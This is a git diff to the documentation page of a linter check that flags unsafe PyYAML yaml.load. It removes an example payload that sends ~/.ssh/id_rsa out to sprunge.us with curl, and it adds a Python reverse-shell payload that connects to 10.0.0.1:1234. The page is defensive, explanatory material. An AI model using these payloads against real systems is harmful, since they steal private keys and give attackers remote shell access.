Add tests for the PickleLoadInspection and documentation

--- a/doc/checks/YML100.md
+++ b/doc/checks/YML100.md
@@ -2,17 +2,15 @@
 
 Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().
 
-The Pyyaml library's default loader will parse YAML like this:
+The Pyyaml library's default loader will read any YAML attributes starting with `!!` as special syntax, including the `!!python/object/apply` command, which can execute any method in the standard library.
 
-```yaml
-!!python/object/apply:os.system ["cat ~/.ssh/id_rsa | curl -F 'sprunge=<-' http://sprunge.us"]
-```
-
-Using `yaml.load` against this input would execute local commands on the host shell
+Because the standard library includes functions to starting local processes, using `yaml.load` against this input would execute local commands on the host shell.
 
 ## Deprecation in pyyaml 5.1
 
-Newer versions of Pyyaml (5.1) will raise a warning, however many situations like web servers developers would not see this warning.
+Wait, didn't pyyaml deprecate the unsafe loader?
+
+Not really- newer versions of pyyaml (5.1) will raise a __warning__, however many situations like web servers developers would not see this warning.
 
 ## Example
 
@@ -21,6 +19,14 @@ import yaml
 with open('cfg.yaml') as cfg:
     config = yaml.load(cfg)
 ```
+
+Any attackers payload could look something like this:
+
+```yaml
+!!python/object/apply:exec ['import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
+```
+
+When deserialized, this would start a shell on TCP 10.0.0.1:1234.
 
 ## Quick Fixes
 
